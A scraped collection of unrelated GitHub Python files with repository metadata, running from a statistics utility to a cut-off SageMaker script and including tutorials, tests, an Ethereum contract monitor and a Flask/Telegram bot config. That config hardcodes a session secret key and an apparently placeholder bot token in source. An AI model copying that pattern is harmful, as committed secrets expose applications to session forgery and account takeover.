Tuple\r\n having as first element the ci as float,\r\n and as second element the ci formatted as\r\n string. The DataFrame formatted as string\r\n is passed to annot argument in seaborn heatmap\r\n functions.\r\n if false, only the ci interval as float is returned.\r\n The default is False.\r\n ci_level: float\r\n lambda (confidence level) for ci.\r\n The default is 0.95.\r\n digit: int\r\n digit for rounding.\r\n The default is 2.\r\n ci_bootstrapping: bool\r\n if True, ci is calculated through bootstrapping.\r\n The default is False\r\n boot_method: Text\r\n type of bootstrapping applied.\r\n Supported: 'percentile', 'basic', 'BCa'.\r\n The default is 'basic'.\r\n boot_n_resamples: int\r\n number of resamples for bootstrapping.\r\n Ignored if ci_boostrapping is false.\r\n The default is 10,000.\r\n\r\n Returns:\r\n ci_output: pd.DataFrame\r\n see return_annot_df in Args for further\r\n details on output.\r\n\r\n \"\"\"\r\n if ci_bootstrapping is False:\r\n\r\n ci = to_ci.apply(\r\n lambda x: calculate_t_ci(\r\n function_to_ci=function_to_ci,\r\n data_to_ci=x,\r\n ci_level=ci_level\r\n ),\r\n axis=0\r\n ).transpose()\r\n ci.columns = ['lower_ci', 'upper_ci']\r\n\r\n else:\r\n ci = list(\r\n map(\r\n lambda x:\r\n (x[0],\r\n bootstrap(\r\n data=[x[1]],\r\n statistic=function_to_ci,\r\n vectorized=False,\r\n n_resamples=boot_n_resamples,\r\n batch=None,\r\n axis=0,\r\n confidence_level=ci_level,\r\n method=boot_method,\r\n random_state=None\r\n )\r\n ),\r\n to_ci.items()\r\n )\r\n )\r\n index = pd.Series(map(lambda x: x[0], ci))\r\n low_ci = pd.Series(map(lambda x: x[1].confidence_interval.low, ci))\r\n high_ci = pd.Series(map(lambda x: x[1].confidence_interval.high, ci))\r\n ci = pd.concat([low_ci, high_ci], axis=1)\r\n ci.index = index\r\n ci.columns = [\"lower_ci\", \"upper_ci\"]\r\n\r\n ci = ci * 100\r\n ci = round(ci, digit)\r\n\r\n if return_annot_df is False:\r\n ci_output = ci\r\n else:\r\n ci = ci.astype(str)\r\n ci_output = '[' + ci[\"lower_ci\"]\r\n ci_output = ci_output.add(', ')\r\n ci_output = ci_output.add(ci[\"upper_ci\"])\r\n ci_output = pd.DataFrame(ci_output.add(']')).transpose()\r\n ci_output.index = [stage_device_name]\r\n\r\n return ci_output\r\n","repo_name":"SRI-human-sleep/sleep_tracker_menu","sub_path":"utils/confidence_interval.py","file_name":"confidence_interval.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"21546059068","text":"from random import randint\nlista = []\nimpares = []\n\nfor i in range(10):\n lista.append(randint(0,50))\n\ntamanho = len(lista)\nfor i in range(tamanho):\n if lista[i] % 2 == 1:\n impares.append(lista[i])\n\nprint(f'A lista de números é {lista}')\nprint(f'A partir da lista de números separamos os ímpares que são: {impares}')\n","repo_name":"santosclaudinei/Python_Geek_University","sub_path":"sec07_ex20.py","file_name":"sec07_ex20.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7942928041","text":"import turtle\n\njoey = turtle.Turtle()\nrico = turtle.Turtle()\nethan = turtle.Turtle()\n\n\njoey.speed(15)\nrico.speed(15)\nethan.speed(15)\n\n\njoey.color(\"forest green\")\n\njoey.penup()\njoey.begin_fill()\njoey.penup()\njoey.goto(0, -200)\njoey.pendown()\njoey.left(180)\njoey.forward(321)\njoey.left(90)\njoey.forward(175)\njoey.left(90)\njoey.forward(630)\njoey.left(90)\njoey.forward(175)\njoey.left(90)\njoey.forward(321)\njoey.end_fill()\njoey.pendown()\n\nturtle.bgcolor(\"Sky blue\")\n\n\nrico.color(\"red\")\nrico.begin_fill()\nrico.goto(-100, -100)\nrico.right(90)\nrico.forward(100)\nrico.left(90)\nrico.forward(200)\nrico.left(90)\nrico.forward(100)\nrico.goto(0, 0)\nrico.goto(-100, -100)\nrico.goto(100, -100)\nrico.end_fill()\n\n\nethan.color(\"black\")\nethan.begin_fill()\nethan.goto(-100, -100)\nethan.goto(100, -100)\nethan.goto(0, 0)\nethan.end_fill()\nethan.penup()\nethan.goto(-80, -140)\nethan.pendown()\n\nethan.begin_fill()\nethan.color(\"brown\")\n\n\ndef square(sidelength):\n for i in range(4):\n ethan.forward(sidelength)\n ethan.right(90)\n\n\nfor i in range(1):\n square(20)\nethan.end_fill()\n\nturtle.exitonclick()","repo_name":"Euphumum/Landscape","sub_path":"Landscape.py","file_name":"Landscape.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"33266286934","text":"import datasets, transformers\nfrom transformers import BertTokenizer, BertForMaskedLM\nfrom bert_perplexity.perplexity import PerplexityPipeline\nimport os\nimport platform\nfrom tqdm import tqdm\n\nop_sys = platform.system()\nif op_sys == \"Windows\":\n PRETRAINED_MODELS_DIR = \"F:/pretrained_models\"\n DATASETS_DIR = \"F:/datasets\"\nelif op_sys == \"Linux\":\n PRETRAINED_MODELS_DIR = \"/users/uestc1/zys/pretrained_models\"\n DATASETS_DIR = \"/users/uestc1/zys/Datasets\"\n\n\n# download if not exists cache_dir\ndef load_model(hf_name=None, cache_dir=None, download=False):\n if download:\n assert not cache_dir\n assert hf_name\n else:\n assert not hf_name\n assert cache_dir\n if download:\n model = download_model_files()\n else:\n model = load_from_cache()\n return model\n\n\n# download_model_files\ndef download_model_files(pretrained_models_dir=PRETRAINED_MODELS_DIR, hf_name=\"bert-base-uncased\",\n ):\n cache_dir = os.path.join(pretrained_models_dir)\n en_tokenizer = BertTokenizer.from_pretrained(\n hf_name,\n cache_dir=cache_dir\n )\n en_model = BertForMaskedLM.from_pretrained(\n hf_name,\n cache_dir=cache_dir\n )\n en_pipeline = PerplexityPipeline(model=en_model, tokenizer=en_tokenizer)\n return en_pipeline\n\n\ndef load_from_cache(pretrained_models_dir=PRETRAINED_MODELS_DIR,\n # bert-base-uncased\n # model_name=\"models--bert-base-uncased/snapshots/1dbc166cf8765166998eff31ade2eb64c8a40076\"\n # bert-base-multilingual-cased\n model_name=\"models--bert-base-multilingual-cased/snapshots/fdfce55e83dbed325647a63e7e1f5de19f0382ba\"\n ):\n en_tokenizer = BertTokenizer.from_pretrained(\n os.path.join(pretrained_models_dir, model_name)\n )\n en_model = BertForMaskedLM.from_pretrained(\n os.path.join(pretrained_models_dir, model_name)).cuda()\n en_pipeline = PerplexityPipeline(model=en_model, tokenizer=en_tokenizer)\n return en_pipeline\n\n\ndef ppl(model, text):\n result = model(text)\n return result\n\n\ndef main():\n model_version = \"bert-base-uncased\"\n model = load_model(cache_dir=True, download=False)\n datasets_dir = DATASETS_DIR\n # train_dataset = datasets.load_dataset(path='wmt16', name=\"de-en\", split=\"train\",\n # cache_dir=datasets_dir)\n train_dataset = datasets.load_dataset(\n os.path.join(datasets_dir,\n \"wmt16\"),\n name=\"de-en\",\n split=\"train\")\n test_texts = [\"there is a book on the desk\",\n \"there is a plane on the desk\",\n \"there is a book in the desk\"]\n for t in test_texts:\n print(ppl(model, t)[\"ppl\"])\n\n data_lenth = len(train_dataset)\n score = [0] * data_lenth\n for idx, row in tqdm(enumerate(train_dataset)):\n model\n en, de = row[\"translation\"][\"en\"], row[\"translation\"][\"de\"]\n score = ppl(model, en)[\"ppl\"] + ppl(model, de)[\"ppl\"]\n\n if (idx + 1) % 1000 == 0:\n print(f\"Score {idx + 1} k /{data_lenth} samples ...\")\n\n index = [\n [116518, 41568, 13049, 39342, 23659, 76413],\n [12051, 113004, 57498, 51064, 47300, 47552],\n [73186, 50806, 17741, 94891, 55986, 44589],\n [69885, 114662, 32893, 103985, 85597, 84899],\n ]\n for i in index:\n for sentence in train_dataset[i][\"translation\"]:\n print(ppl(model, sentence[\"en\"])[\"ppl\"] + ppl(model, sentence[\"de\"])[\"ppl\"])\n print(\"-\" * 30)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"zhangyisheng0629/kenlm_cl","sub_path":"perplex.py","file_name":"perplex.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35108232158","text":"# pylint:disable=missing-docstring,invalid-name,unused-variable\n\nimport typing\n\nimport graphene\n\nimport graphene_resolver as resolver\n\n\ndef test_simple():\n class FirstPet(resolver.Resolver):\n schema = 'Pet!'\n\n def resolve(self, **kwargs):\n return {\n 'name': 'pet1',\n 'age': 1\n }\n\n class Pet(resolver.Resolver):\n schema = {\n 'name': 'String',\n 'age': 'Int',\n }\n\n class Query(graphene.ObjectType):\n first_pet = FirstPet.as_field()\n\n schema = graphene.Schema(query=Query)\n assert str(schema) == '''\\\nschema {\n query: Query\n}\n\ntype Pet {\n name: String\n age: Int\n}\n\ntype Query {\n firstPet: Pet!\n}\n'''\n result = schema.execute('''\\\n{\n firstPet{\n name\n age\n }\n}\n''')\n assert not result.errors\n assert result.data == {\n \"firstPet\": {\"name\": 'pet1',\n 'age': 1}\n }\n\n\ndef test_node():\n pets = [dict(\n id=1,\n name='pet1',\n age=1,\n )]\n\n class FirstPet(resolver.Resolver):\n schema = 'Pet!'\n\n def resolve(self, **kwargs):\n return pets[0]\n\n class Pet(resolver.Resolver):\n schema = {\n 'type': {\n 'name': 'String',\n 'age': 'Int',\n },\n 'interfaces': (graphene.Node,)\n }\n\n def get_node(self, id_):\n return next(i for i in pets if i['id'] == int(id_))\n\n def validate(self, value):\n return (\n isinstance(value, typing.Mapping)\n and isinstance(value.get('name'), str)\n and isinstance(value.get('age'), int)\n )\n\n class Query(graphene.ObjectType):\n first_pet = FirstPet.as_field()\n\n schema = graphene.Schema(query=Query)\n assert str(schema) == '''\\\nschema {\n query: Query\n}\n\ninterface Node {\n id: ID!\n}\n\ntype Pet implements Node {\n id: ID!\n name: String\n age: Int\n}\n\ntype Query {\n firstPet: Pet!\n}\n'''\n result = schema.execute('''\\\n{\n firstPet{\n name\n age\n }\n}\n''')\n assert not result.errors\n assert result.data == {\n \"firstPet\": {\"name\": 'pet1',\n 'age': 1}\n }\n","repo_name":"NateScarlet/graphene-resolver","sub_path":"tests/test_dynamic_resolver.py","file_name":"test_dynamic_resolver.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"15374467472","text":"# Chapter 01-3\n# 파이썬 심화\n# 클래스 메소드, 인스턴스 메소드, 스테틱 메소드\n# 코드를 모듈화하여 만들 수 있음 > 패키지로 발전함\n\n# 기본 인스턴스 메소드\nclass Student(object):\n '''\n Student Class\n Author : kim\n Date : 2020.05.21\n Description : Class, Static, Instance Method\n '''\n # 등록금인상률 - 전역 적용되는 class 변수\n tuition_per = 1.0\n\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\n self._id = id\n self._first_name = first_name\n self._last_name = last_name\n self._email = email\n self._grade = grade\n self._tuition = tuition\n self._gpa = gpa\n\n # Instance Method - 각각의 인스턴스를 구분할 수 있는 고유한 값\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {}, {}, {}, {}, {}, {}'.format(self._id, self.full_name(), self._email, self._grade, self._tuition, self._gpa)\n\n def get_fee(self):\n return 'Before Tuition -> Id : {}, Tuition : {}'.format(self._id, self._tuition)\n\n def get_fee_calc(self):\n return 'After Tuition -> Id : {}, fee : {}'.format(self._id, self._tuition * Student.tuition_per)\n \n def __str__(self):\n return 'Student Info -> name : {}, grade : {}, email : {}'.format(self.full_name(), self._grade, self._email)\n\n\n # Class Method\n @classmethod\n def raise_fee(cls, percent):\n if percent <= 1:\n print(\"Please Enter 1 or More\")\n return\n cls.tuition_per = percent # cls == Student\n print(\"Succeed! Tuition increased!\")\n \n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition, gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.tuition_per, gpa)\n\n # Static Method\n @staticmethod\n def is_scholarship_st(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. {} is not a scholarshp receipient.'.format(inst.full_name())\n\n# 학생 인스턴스\nstudent_1 = Student(1, 'Kim', 'Sarang', 'test@test.com', 1, 400, 3.5)\nstudent_2 = Student(2, 'Lee', 'Myungho', 'student@nest.com', 2, 500, 4.3)\n\n# 기본정보\nprint(student_1)\nprint(student_2)\n\n# 전체정보\nprint(student_1.detail_info())\nprint(student_2.detail_info())\n\n# 학비 정보 (인상전)\nprint(student_1.get_fee())\nprint(student_2.get_fee())\n\n# 학비 인상(클래스 메소드 미사용) : 직접 접근 NOT GOOD!\n# Student.tuition_per = 1.2\n\n# 학비 정보 (인상후)\nprint(student_1.get_fee_calc())\nprint(student_2.get_fee_calc())\n\n# classmethod로 인상률 변경\nStudent.raise_fee(1.3)\n\nprint(student_1.get_fee_calc())\nprint(student_2.get_fee_calc())\n\n# 클래스 메소드를 활용한(line 51) 인스턴스 생성 실습\nstudent_3 = Student.student_const(3, 'Park', 'Minji', 'gmail@student.com', 3, 550, 4.5)\nstudent_4 = Student.student_const(4, 'Cho', 'Sunghan', 'line@student.com', 4, 600, 4.1)\n\n# 학생 정보\nprint(student_3.detail_info())\nprint(student_4.detail_info())\n\n# 학비가 올랐는지 확인, 53행으로 인해 인상된 가격 적용\nprint(student_3._tuition)\nprint(student_4._tuition) \n\n\n# Static Method\n# 장학금 혜택 여부 (static method 미사용)\ndef is_scholarship(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. {} is not a scholarshp receipient.'.format(inst.full_name())\n\n# is_scholarship 함수가 종속된 class가 없음\nprint(is_scholarship(student_1))\nprint(is_scholarship(student_2))\nprint(is_scholarship(student_3))\nprint(is_scholarship(student_4))\n\n# 장학금 혜택 여부 (static method 사용)\nprint(Student.is_scholarship_st(student_1))\nprint(Student.is_scholarship_st(student_2))\nprint(Student.is_scholarship_st(student_3))\nprint(Student.is_scholarship_st(student_4))\n\n# 상속으로 이것도 됨\nprint(student_1.is_scholarship_st(student_4))","repo_name":"bunnycast/python","sub_path":"advanced/chapter01_03.py","file_name":"chapter01_03.py","file_ext":"py","file_size_in_byte":4093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"34611593594","text":"import colorlog\nimport logging\n\nchdr = colorlog.StreamHandler()\nfhdr = logging.FileHandler(\"test_log.log\")\nlogger = colorlog.getLogger()\nlogging_fmt = colorlog.ColoredFormatter(\n '%(log_color)s%(asctime)-15s %(levelname)-7s {%(module)s:%(lineno)d} %(message)s'\n)\nf_l_fmt = logging.Formatter('%(asctime)-15s %(levelname)-7s {%(module)s:%(lineno)d} %(message)s')\n\nlogger.setLevel(logging.DEBUG)\nchdr.setFormatter(logging_fmt)\nfhdr.setFormatter(f_l_fmt)\nlogger.addHandler(chdr)\nlogger.addHandler(fhdr)\n\n\nlogging.critical(\"Hello this is critical log\")\nlogging.error(\"Hello this is error log\")\nlogging.warning(\"Hello this is warning log\")\nlogging.info(\"Hello this is info log\")\nlogging.debug(\"Hello this is debug log\")\n","repo_name":"mybeang/workspace3","sub_path":"colorlog_example.py","file_name":"colorlog_example.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"39632295583","text":"import matplotlib.pyplot as plt\nfrom matplotlib.backends import qt4_compat\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n\nimport cPickle\nfrom PyQt4 import QtGui, QtCore\nimport numpy as np\n\n# Custom modules/functions\nimport CarBuyingBackend as backend\n\nclass MyMplCanvas(FigureCanvas):\n \"\"\"Ultimately, this is a QWidget (as well as a FigureCanvasAgg, etc.).\"\"\"\n def __init__(self, parent=None, width=5, height=4, dpi=100):\n self.fig = plt.Figure(figsize=(width, height), dpi=dpi)\n self.ax = self.fig.add_subplot(111)\n # We want the axes cleared every time plot() is called\n\n FigureCanvas.__init__(self, self.fig)\n self.setParent(parent)\n\n FigureCanvas.setSizePolicy(self,\n QtGui.QSizePolicy.Expanding,\n QtGui.QSizePolicy.Expanding)\n FigureCanvas.updateGeometry(self)\n\n self.ax.set_xlabel('Mileage')\n self.ax.set_ylabel('Price')\n self.ax.set_xlim([30000, 90000])\n self.ax.set_ylim([3000, 15000])\n self.ax.grid()\n\nclass carBuyingPlot(MyMplCanvas):\n def __init__(self, name = 'Name', parent = None):\n super(carBuyingPlot, self).__init__(parent=parent)\n self.name = str(name)\n self.curves = {}\n\n def addCurve(self, min, max, avg, name = None, color = 'b'):\n self.curves[name] = Curve(min, max, avg, self.ax, color = color)\n return\n\n def addLegend(self):\n lines = []\n labels = []\n for label in self.curves.keys():\n lines.append(self.curves[label].avg)\n labels.append(label)\n self.legend = self.fig.legend(lines, labels, 'upper right')\n return\n\nclass Curve(object):\n def __init__(self, min, max, avg, ax, color = 'b', label = None, alpha = 0.2):\n self.bounds = self.getBounds(min, max, ax)\n self.avg = self.getAvg(avg, ax, label)\n self.bounds.set_alpha(0.2)\n color = np.random.rand(3)\n self.setColor(color)\n self.setLabel(label)\n self.setAlpha(alpha)\n \n def getBounds(self, min, max, ax):\n x_values = min[:,0]\n bounds = ax.fill_between(x_values, min[:,1], max[:,1], axes = ax)\n return bounds\n\n def getAvg(self, avg, ax, label):\n x_values = avg[:,0]\n avgPlot, = ax.plot(x_values, avg[:,1])\n return avgPlot\n\n def setColor(self, color):\n self._color = color\n self.bounds.set_facecolors(color)\n self.avg.set_color(color)\n return\n\n def setAlpha(self, alpha):\n self._alpha = alpha\n self.bounds.set_alpha(alpha)\n return\n\n def updateValues(self, min, max, avg, ax):\n x_values = min[:,0]\n self.bounds = ax.fill_between(x_values, min[:,1], max[:,1], axes = ax, alpha = self._alpha, color = self._color)\n return\n\n def setLabel(self, label):\n self.avg.set_label(label)\n return\n\ndef getTestData(year = '2011'):\n data = backend.getMakeData('Toyota')\n return data.data['Prius'][year]['One Hatchback 4D ']\n\ndef testAddData(years, plot, colors = ['r', 'g', 'b']):\n for i, year in enumerate(years):\n data = getTestData(year = str(year))\n\n min = data['priceMin']\n max = data['priceMax']\n avg = data['price']\n plot.addCurve(min, max, avg, name = str(year), color = colors[i])\n\n plot.addLegend()\n return\n\nif __name__ == '__main__':\n import numpy as np\n\n plot = carBuyingPlot()\n years = [2011, 2013]#, 2013]\n \n testAddData(years, plot)\n plot.show()\n plt.show()","repo_name":"wzaylor/CarBuying","sub_path":"carBuyingPlot.py","file_name":"carBuyingPlot.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"18171518714","text":"# This script accesses environment variable:\n# GH_ACCESS_TOKEN\n# This script needs the following package:\n# pip install PyGithub \n\n# testing out the Github API - trying it out here before I use it in search-images.py\nfrom github import Github\n\n# use this to form url to the raw images\nonline_url = 'https://raw.githubusercontent.com/MicrosoftDocs/azure-docs/main/' \n\n# First create a Github instance:\n# using an access token\nimport os\ntoken = os.environ['GH_ACCESS_TOKEN']\ng = Github(token)\n\nrepo = g.get_repo(\"MicrosoftDocs/azure-docs\")\ncontents = repo.get_contents(\"articles/machine-learning/v1/media\")\nwhile contents:\n file_content = contents.pop(0)\n if file_content.type == \"dir\":\n contents.extend(repo.get_contents(file_content.path))\n else:\n img_url = online_url + file_content.path\n print(img_url)","repo_name":"sdgilley/search-images","sub_path":"pygithub.py","file_name":"pygithub.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"72590642053","text":"from __compute_polarization__ import get_polarization\nimport networkx as nx\nimport random\nimport time\n\n\ndef random_edge_addition(k, graph_in):\n\n edges_to_add_list = []\n polarizations = [0]*len(k)\n edges_list = list(nx.non_edges(graph_in))\n\n start = time.time()\n\n # run 20 times to sample and then average the results of random edge selection\n for i in range(20):\n for j, k_edge in enumerate(k):\n\n edges_to_add_list = random.sample(edges_list, k_edge)\n\n g_copy = graph_in.copy()\n g_copy.add_edges_from(edges_to_add_list)\n\n polarizations[j] += get_polarization(g_copy)[0]\n\n end = time.time()\n elapsed = end - start\n\n averaged_polarizations = [x / 20 for x in polarizations]\n\n return edges_to_add_list, averaged_polarizations, [elapsed] * len(k)\n","repo_name":"leobouts/social-media-polarization","sub_path":"project/social_polarization/__algorithm_random__.py","file_name":"__algorithm_random__.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"36055946052","text":"# coding: utf-8\n# 設置 App.config\nSECRET_KEY = 'b07481bjava7704sd25sd27d53000e6b1daI52f47'\nSESSION_PROTECTION = 'strong'\nJSON_AS_ASCII = False\n#CSRF_ENABLED = True\nTEMPLATES_AUTO_RELOAD = True\n\n# 設置 bot_poc.config\nBOT_API_KEY = \"1234567890:ABCDEFGHIJKKKKKKKKKK\"\nBOT_HOOK_URL = \"https://Domainnnnnnnnnnnnn/hook\"","repo_name":"keoy7am/chat_match_telegram_bot","sub_path":"bot_poc/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"44"} +{"seq_id":"1780404356","text":"from abc import ABC, abstractmethod\nfrom typing import Optional, cast\n\nimport shortuuid\n\nfrom app.domain.course import (\n Course,\n CourseNameAlreadyExistsError,\n CourseNotFoundError,\n CourseRepository,\n)\n\nfrom ...domain.review.review import Review\nfrom ..collab.collab_query_model import CollabReadModel\nfrom ..content.content_command_model import ContentCreateModel, ContentUpdateModel\nfrom ..content.content_query_model import ContentReadModel\nfrom ..review.review_command_model import ReviewCreateModel\nfrom .course_command_model import CourseCreateModel, CourseUpdateModel\nfrom .course_query_model import CourseReadModel\n\n\nclass CourseCommandUseCaseUnitOfWork(ABC):\n\n course_repository: CourseRepository\n\n @abstractmethod\n def begin(self):\n raise NotImplementedError\n\n @abstractmethod\n def commit(self):\n raise NotImplementedError\n\n @abstractmethod\n def rollback(self):\n raise NotImplementedError\n\n\nclass CourseCommandUseCase(ABC):\n @abstractmethod\n def create_course(\n self, data: CourseCreateModel, creator_id: str\n ) -> Optional[CourseReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def update_course(\n self, id: str, data: CourseUpdateModel\n ) -> Optional[CourseReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def delete_course_by_id(self, id: str):\n raise NotImplementedError\n\n @abstractmethod\n def add_collab(self, course_id: str, user_id: str) -> Optional[CollabReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def deactivate_collab_from_course(self, user_id: str, course_id: str):\n raise NotImplementedError\n\n @abstractmethod\n def add_content(self, data, course_id):\n raise NotImplementedError\n\n @abstractmethod\n def update_content(\n self, course_id: str, data: ContentUpdateModel, content_id: str\n ) -> Optional[ContentReadModel]:\n raise NotImplementedError\n\n @abstractmethod\n def user_involved(self, course_id: str, user_id: str) -> bool:\n raise NotImplementedError\n\n @abstractmethod\n def add_review(self, id: str, data: ReviewCreateModel):\n raise NotImplementedError\n\n\nclass CourseCommandUseCaseImpl(CourseCommandUseCase):\n def __init__(\n self,\n uow: CourseCommandUseCaseUnitOfWork,\n ):\n self.uow: CourseCommandUseCaseUnitOfWork = uow\n\n def create_course(\n self, data: CourseCreateModel, creator_id: str\n ) -> Optional[CourseReadModel]:\n try:\n uuid = shortuuid.uuid()\n course = Course(\n id=uuid,\n creator_id=creator_id,\n name=data.name,\n price=data.price,\n active=True,\n language=data.language,\n country=data.country,\n description=data.description,\n categories=data.categories,\n presentation_video=data.presentation_video,\n image=data.image,\n subscription_id=data.subscription_id,\n recommendations={},\n )\n\n existing_course = self.uow.course_repository.find_by_name(data.name)\n if existing_course is not None:\n raise CourseNameAlreadyExistsError\n self.uow.course_repository.create(course)\n self.uow.commit()\n\n created_course = self.uow.course_repository.find_by_id(uuid)\n except:\n self.uow.rollback()\n raise\n\n return CourseReadModel.from_entity(cast(Course, created_course))\n\n def update_course(\n self, id: str, data: CourseUpdateModel\n ) -> Optional[CourseReadModel]:\n try:\n existing_course = self.uow.course_repository.find_by_id(id)\n if existing_course is None:\n raise CourseNotFoundError\n\n course = Course(\n id=id,\n creator_id=existing_course.creator_id,\n name=data.name,\n price=existing_course.price,\n language=data.language,\n country=existing_course.country,\n active=True,\n description=data.description,\n categories=data.categories,\n presentation_video=data.presentation_video,\n image=data.image,\n recommendations={},\n subscription_id=data.subscription_id,\n created_at=existing_course.created_at,\n )\n\n self.uow.course_repository.update(course)\n\n updated_course = self.uow.course_repository.find_by_id(course.id)\n\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return CourseReadModel.from_entity(cast(Course, updated_course))\n\n def delete_course_by_id(self, id: str):\n try:\n existing_course = self.uow.course_repository.find_by_id(id)\n if existing_course is None:\n raise CourseNotFoundError\n\n self.uow.course_repository.delete_by_id(id)\n\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n def add_collab(self, course_id: str, user_id: str) -> Optional[CollabReadModel]:\n try:\n course = self.uow.course_repository.find_by_id(course_id)\n if course is None:\n raise CourseNotFoundError\n collab = self.uow.course_repository.add_collab(\n course_id=course_id, user_id=user_id\n )\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return collab\n\n def deactivate_collab_from_course(self, user_id: str, course_id: str):\n try:\n course = self.uow.course_repository.find_by_id(course_id)\n if course is None:\n raise CourseNotFoundError\n self.uow.course_repository.deactivate_collab_from_course(user_id, course_id)\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n def add_content(\n self, data: ContentCreateModel, course_id: str\n ) -> Optional[ContentReadModel]:\n try:\n course = self.uow.course_repository.find_by_id(course_id)\n if course is None:\n raise CourseNotFoundError\n content = self.uow.course_repository.add_content(\n data=data, course_id=course_id\n )\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return content\n\n def update_content(\n self, course_id: str, data: ContentUpdateModel, content_id: str\n ) -> Optional[ContentReadModel]:\n try:\n existing_course = self.uow.course_repository.find_by_id(course_id)\n if existing_course is None:\n raise CourseNotFoundError\n updated_content = self.uow.course_repository.update_content_from_course(\n course_id=course_id, data=data, content_id=content_id\n )\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return updated_content\n\n def user_involved(self, course_id: str, user_id: str) -> bool:\n return self.uow.course_repository.user_involved(\n course_id=course_id, user_id=user_id\n )\n\n def add_review(self, id: str, data: ReviewCreateModel):\n try:\n existing_course = self.uow.course_repository.find_by_id(id)\n if existing_course is None:\n raise CourseNotFoundError\n rev = Review(\n id=data.id,\n course_id=id,\n recommended=data.recommended,\n review=data.review,\n )\n review = self.uow.course_repository.add_review(review=rev)\n self.uow.commit()\n except:\n self.uow.rollback()\n raise\n\n return review\n","repo_name":"Ubademy/ubademy.service.courses","sub_path":"app/usecase/course/course_command_usecase.py","file_name":"course_command_usecase.py","file_ext":"py","file_size_in_byte":7996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"25367494678","text":"from base import BlockEvent, BaseMonitor, Transaction\nfrom models import session, tokens_details, Contract, Network\n\n\nclass EthSendingMonitor(BaseMonitor):\n event_type = 'launch'\n\n def on_new_block_event(self, block_event: BlockEvent):\n\n deploy_hashes = {}\n for transactions_list in block_event.transactions_by_address.values():\n for transaction in transactions_list:\n deploy_hashes[transaction.tx_hash.lower()] = transaction\n\n details_with_whitelabel = []\n for detail in tokens_details:\n result = session.query(detail, Contract, Network).join(Contract, detail.contract_id == Contract.id) \\\n .filter(Contract.network_id == Network.id) \\\n .filter(detail.white_label_hash.in_(deploy_hashes.keys())) \\\n .filter(Network.name == block_event.network.type)\n\n details_with_whitelabel.extend(result)\n\n for details in details_with_whitelabel:\n print(\"contract_id: \", details[0].contract_id,\n 'white_label hash: ',details[0].white_label_hash)\n transaction: Transaction = deploy_hashes[details[0].white_label_hash]\n tx_receipt = block_event.network.get_tx_receipt(transaction.tx_hash)\n\n message = {\n 'contractId': details[0].contract_id,\n 'transactionHash': transaction.tx_hash,\n 'address': transaction.creates,\n 'success': tx_receipt.success,\n 'status': 'COMMITTED'\n }\n\n self.send_to_backend(message)\n","repo_name":"MyWishPlatform/mywill_scanner","sub_path":"monitors/contract/eth_sending.py","file_name":"eth_sending.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"10933594719","text":"from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostCreateForm\nfrom .models import Post\n\ndef home(request):\n template = 'blog/home.html'\n posts = Post.objects.all().order_by('-updated')\n context = {\n 'posts': posts,\n }\n return render(request,template,context)\n\n@login_required(login_url='/accounts/login/') \ndef create(request):\n template = 'blog/create.html'\n form = PostCreateForm()\n \n\n if request.method == 'POST':\n post_create = PostCreateForm(request.POST)\n if post_create.is_valid():\n \n post_create.save()\n messages.success(request, f'Your Post is created successfully !')\n return redirect('User:home') \n context = {\n 'form':form,\n }\n return render(request,template,context)","repo_name":"prathmesh2048/Tradexa_assignment","sub_path":"User/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"16822889818","text":"import argparse\nimport boto3\nimport sagemaker\nfrom sagemaker.estimator import 